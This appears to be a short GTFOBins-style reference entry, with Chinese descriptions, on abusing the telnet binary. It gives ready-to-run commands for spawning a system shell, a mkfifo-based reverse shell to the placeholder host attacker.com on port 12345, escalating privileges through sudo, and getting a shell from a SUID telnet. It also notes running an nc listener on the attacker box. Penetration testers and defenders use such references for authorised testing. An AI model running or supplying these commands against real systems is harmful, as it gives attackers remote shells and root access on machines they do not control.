.. / telnet

shell

用来生成一个交互式的系统shell。

• BSD version only. Needs to be connected first.

  RHOST=attacker.com
  RPORT=12345
  telnet $RHOST $RPORT
  ^]
  !/bin/sh
  

reverse-shell

向监听的端口发送反向shell，以打开远程网络访问。

• Run nc -l -p 12345 on the attacker box to receive the shell.

  RHOST=attacker.com
  RPORT=12345
  TF=$(mktemp -u)
  mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
  

sudo

如果二进制文件被 sudo 允许以超级用户身份运行，可能被用于访问文件系统、提升或维持特权访问。

• BSD version only. Needs to be connected first.

  RHOST=attacker.com
  RPORT=12345
  sudo telnet $RHOST $RPORT
  ^]
  !/bin/sh
  

limited-suid

suid是一种授予文件的权限类型，它允许用户使用者以文件所有者的权限来执行文件。

• BSD version only. Needs to be connected first.

  RHOST=attacker.com
  RPORT=12345
  ./telnet $RHOST $RPORT
  ^]
  !/bin/sh